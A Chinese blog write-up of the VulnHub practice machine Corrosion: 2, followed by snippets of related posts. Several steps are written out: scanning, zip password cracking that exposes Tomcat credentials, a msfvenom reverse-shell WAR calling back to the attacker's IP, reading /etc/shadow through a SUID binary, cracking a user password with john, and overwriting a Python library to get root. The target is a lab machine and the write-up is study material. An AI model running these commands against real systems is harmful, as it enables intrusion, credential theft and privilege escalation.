Corrosion2( 侵蚀)靶机

最新推荐文章于 2024-04-07 22:20:09 发布
最新推荐文章于 2024-04-07 22:20:09 发布
阅读量578 收藏
点赞数
分类专栏: vulhub系列 文章标签: linux 运维 服务器 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/127145675
版权

环境准备

靶机链接:百度网盘 请输入提取码

提取码:o643

虚拟机网络链接模式:桥接模式

攻击机系统:kali linux 2021.1

信息收集

1.arp-scan -l 探测目标靶机ip

2.nmap -p- -A -T4 192.168.1.103 探测目标靶机开放端口和服务

3.gobuster dir -u http://192.168.1.103:8080 -w /usr/share/wordlists/dirb/big.txt -t 50 -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak

探测到一个backup.zip 的文件 将他下载下来

漏洞利用

1.wget http://192.168.1.103:8080/backup.zip

将文件下载下来进行解压!

2.gzip -d rockyou.txt.gz //解压字典里的密码文件

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip //解出文件密码

3.cat tomcat-users.xml

username="manager" password="melehifokivai"

username="admin" password="melehifokivai"

4.80端口扫描出来有一个文件上传的目录,用msfvenom生成war包,上传上去后开启监听,点击shell1.war触发木马,成功回弹shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.105 LPORT=4444 -f war > shell1.war

5.进去之后尝试出jaye的密码

6.登录ssh ,反弹交互式shell python3 -c "import pty;pty.spawn('/bin/bash')"

权限提升

1.用find命令查看suid权限文件,发现一个look

find / -perm -u=s -type f 2>/dev/null

2.look命令就是查找的意思

./look ' ' "$LFILE"

./look '' /etc/passwd

./look '' /etc/shadow

$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/

暴力破解下root密码 ,失败!

3.再暴力破解randy用户密码

john --wordlist=/usr/share/wordlists/rockyou.txt hash

07051986randy

4.ssh登录下

5.sudo -l 发现一个.py文件有权限,查看.py文件后发现,他一直调用base64

6.最后发现没有写入权限,最终目标在base64.py

7.查看权限后。确认可以写入提权脚本

ls -la /usr/lib/python3.8/base64.py

8.echo 'import os;os.system("/bin/bash")' > /usr/lib/python3.8/base64.py

sudo /usr/bin/python3.8 /home/randy/randombase64.py //执行之后就会触发写入的提权脚本;

最终成功提权,进入root 成功拿下!!!

魏钦6666
关注
专栏目录
46244-130838-1-SM_corrosion_
09-29
2. **测厚仪**:利用超声波或磁性原理,测厚仪可以测量材料的剩余厚度,评估腐蚀程度。这种方法适用于金属材料,尤其是钢铁,对于涂层下腐蚀的检测尤为有效。 3. **电化学方法**: - **电位测量**:通过测量材料相...
Corrosion2靶机wp
m0_52496313的博客
08-24 529
Corrosion2靶机wp
Corrosion2 靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-31 875
Corrosion2 靶场渗透记录~ 提权太难懂~~~~~~
vulnhub-Corrosion: 2
qq_43006864的博客
05-12 520
Corrosion: 2 ~ VulnHub 靶机Corrosion: 2 ~ VulnHub 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: nmap -sS -sV -A -p- 192.168.1.108 主机开放了三个端口。 访问一下80和8080 分别是Apache和Tomcat中间件的界面。没啥发现,开始目.
vulnhub靶机-Corrosion:2
臭nana的博客
05-03 651
1、找到靶机ip:192.168.1.106 nmap -sn 192.168.1.0/24 2、扫描靶机端口,开放22、80和8080端口
vulnhub靶场——CORROSION:2
Czheisenberg的博客
02-16 3156
vulnhub靶场——CORROSION:2 Wirteup
Expansion and corrosion
07-13
在IT行业中,"Expansion and Corrosion"通常指的是在软件开发和系统运行过程中遇到的两种问题:程序的规模扩展(Expansion)以及数据或系统资源的损耗(Corrosion)。这两个概念在不同层面都有其独特的含义和重要性...
Corrosion Test
10-06
为了解决这一问题,"Corrosion Test"软件应运而生,它专为腐蚀与防护领域的研究者和工程师提供了强大的分析工具,帮助他们更好地理解材料的腐蚀行为并制定有效的防护策略。 "Corrosion Test"软件的核心功能包括极化...
corrosion:Eclipse Corrosion-Eclipse IDE中的Rust版本
05-04
Corrosion是Eclipse IDE的Rust开发插件,通过与Rust Analyzer语言服务器,CargoRunner和gdb调试器集成,提供了丰富的版本体验。 下载/安装 腐蚀 从成熟的Eclipse IDE进行Rust开发。 或者 在您的计算机上正确安装了...
密码暴力破解
qq_45455136的博客
03-31 4540
密码暴力破解 什么是暴力破解 不安全的密码 密码猜解思路 Python暴力破解 BurpSuite暴力破解 DVWA的low等级暴力破解 DVWA的high等级暴力破解 其他暴力破解工具 wfuzz Hydra Medusa msfconsole 如何防御暴力破解 服务器防御
Vulnhub靶机Corrosion 2
qq_48904485的博客
01-10 963
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机corrosion:2(10.0.2.13)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/corrosion-2,745/
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:2
Aluxian_的博客
06-26 1226
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Medium这个靶机难度中偏上 因为比较麻烦1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.文件包含漏洞,包含日志文件ssh写入木马ssh ''@靶机(新知识点!3.nc反弹shell(这里要使用url编码)zip2john爆破和fcrackzip。
Corrosion_2
追求卓越,技术流~
01-19 3858
这里写自定义目录标题靶场环境信息收集漏洞利用权力提升总结 靶场环境 攻击机:Kali IP:192.168.247.129 靶机Corrosion_2 IP:192.168.247.137 信息收集 Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-19 07:56 EST Nmap scan report for 192.168.247.137 Host is up (0.00078s latency). Not shown: 65532 clos
50.网络安全渗透测试—[穷举篇13]—[wfuzz多线程百万密码测试指定后台破解]
qwsn
08-07 2548
1、多线程百万密码测试指定后台破解 01 靶机后台登录页面:http://www.blogs.com/admin/index.php?action=login 02 百万密码字典 csdnpass.txt #注意:不可以使用Burp爆破,字典太大 #这里,我们使用wfuzz爆破 03 wfuzz:kali里面的工具 wfuzz --help Warning: Pycurl is not compiled against Openssl. Wfuzz might not work co
vulhub打靶记录——Corrosion2
最新发布
qq_55202378的博客
04-07 963
nmap端口扫描。发现靶机开放的服务;对web服务进行目录扫描,发现8080端口的web服务存在备份文件backup.zip;使用john对zip文件进行密码破解,查看tomcat-users.xml文件,获得密码,再登录tomcat后台;msfvenom生成war包的后门文件,通过tomcat上传WAR;监听端口,访问后门,获取webshell;由之前获取的密码登录靶机,成功登录jaye用户;寻找SUID程序,由look程序,查看/etc/shadow,破解randy用户密码。
corrosion 靶机(ffuf模糊测试,命令执行)
m0_66299232的博客
01-13 893
4.因为22端口开放,又有文件泄露漏洞,那么就可以利用22端口把木马写入auth.log文件里,造成命令执行。4.下载下来后,进行解压不成功需要密码,使用fcrackzip进行破解密码。2.访问网页1发现/archives下面有俩个文件,访问后有一个php文件。1.由于没有找到可利用信息,将linpeas.sh下载下来,进行探测。2.找到一个user_backup.zip文件,应该是一个用户的备份!3.既然这个命令是三个小命令合起来的 ,那么就有三种提权方法!6.开启监听,执行命令,反弹shell成功。
Vulnhub——Corrosion:2靶机
Re1_zf的博客
11-28 315
使用john对压缩包密码进行一下破解zip2john backup.zip > pass.txt //先用zip2john爆出hash文件john --wordlist=/usr/share/wordlists/rockyou.txt //再用john结合字典爆出密码。
看完这篇 教你玩转渗透测试靶机vulnhub—Corrosion:1
Aluxian_的博客
06-24 1902
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Easy。
Good morning all teachers and students, my name is liangwenjun The topic of my report is Influence of molten salt potential on stress corrosion cracking behavior of 316 stainless steel. Stress corrosion cracking (SCC) is the cracking of sensitive materials resulting from the combined action of a fixed tensile stress and some specific corrosive medium.As shown in the picture on the right, Stress corrosion cracking is also one of the main causes of reactor structural material failure。 Structural materials for molten salt reactors must have good resistance to fluoride corrosion, excellent mechanical properties, good resistance to high temperature oxidation and irradiation Stainless steels such as 316 have ASME certification for high-temperature pile materials andare very economical.Therefore, many companies are considering 316 stainless steel as a structural material when designing molten salt reactors。Such as Kairos power and Terra power. 316 showed good corrosion resistance in purified molt en fluoride salt, and in Chen's study 316 did not crack with or without Cr addition under the synergistic effect of stress. Therefore, we accelerate corrosion by adding europium ion, and in the study to quantify the molten salt potential and stress magnitude, and finally determine the effect of molten salt potential on stress corrosion cracking of 316 stainless steel.
02-15
早上好,各位老师和同学们,我的名学是梁文军。我的报告的主题是:熔盐电位对316不锈钢应力腐蚀开裂行为的影响。 应力腐蚀开裂(SCC)是指敏感材料由固定的拉应力和某些特定腐蚀介质的结合作用导致的裂纹。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值